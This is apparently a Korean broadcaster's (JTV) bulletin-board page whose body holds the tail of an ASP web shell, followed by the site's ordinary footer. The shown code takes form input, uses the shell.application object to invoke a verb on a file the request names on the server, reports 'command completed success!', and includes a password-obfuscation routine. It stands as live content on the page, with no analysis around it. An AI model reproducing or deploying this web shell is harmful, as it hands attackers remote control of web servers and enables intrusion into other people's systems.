DSnXA6 = Request.Form("text6")
if DSnXA5<>"" and DSnXA6<>"" then
set shell3=server.createobject("shell.application") '쉔접shell뚤蹶
shell3.namespace(DSnXA5).items.item(DSnXA6).invokeverb
response.write "command completed success!"
end if
end if
%>
</body>
<%
end select
function Epass(pass)
temppass=StrReverse(left(pass&"zxcvbnm,./",10))
templen=len(pass)
mmpassword=""
for j=1 to 10
mmpassword=mmpassword+chr(asc(mid(temppass,j,1))-templen+int(j*1.1))
next
Epass=replace(mmpassword,"'","B")
end function
%>

me2day

수정 답변 삭제 목록으로

댓글 0개 | 엮인글 0개

공지사항

하단로고

본 사이트는 이메일주소를 무단수집하는 행위를 거부합니다. [법률 제 8486호]

[54859] 전북특별자치도 전주시 덕진구 정여립로 1083 JTV

TEL : 063-250-5200 FAX : 063-250-5249

Copyrights © 2024 jtv.co.kr All Rights Reserved.

지역민영방송

위로